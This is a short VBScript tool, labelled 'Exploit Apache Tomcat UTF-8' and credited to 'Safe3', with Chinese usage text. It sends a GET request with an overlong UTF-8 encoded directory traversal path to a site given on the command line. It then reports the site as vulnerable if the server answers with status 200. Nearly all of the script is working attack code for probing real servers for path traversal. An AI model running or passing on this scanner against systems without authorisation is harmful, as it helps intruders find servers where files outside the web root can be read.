Dim strUrl,strSite

showB()
Set Args = Wscript.Arguments

If Args.Count <> 1 Then
ShowU()
Else
strSite=Args(0)
End If

 strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"

 Set objXML = CreateObject("Microsoft.XMLHTTP")
 objXML.Open "GET",strSite & strUrl, False
 objXML.SetRequestHeader "Referer", strSite

 objXML.send()

if objXML.status=200 then
 wscript.echo("存在漏洞")

end if

 

Sub showB()
With Wscript
 .Echo("+--------------------------=====================------------------------------+")
 .Echo("Exploit Apache Tomcat UTF-8")
 .Echo("Code By Safe3")
 .Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
 .Echo("+--------------------------=====================------------------------------+")
 .Echo("用法:")
 .Echo(" cscript "&.ScriptName&" site")
 .Echo("例子:")
 .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt")
 .Echo("+--------------------------=====================------------------------------+")
 .Quit
End with
End Sub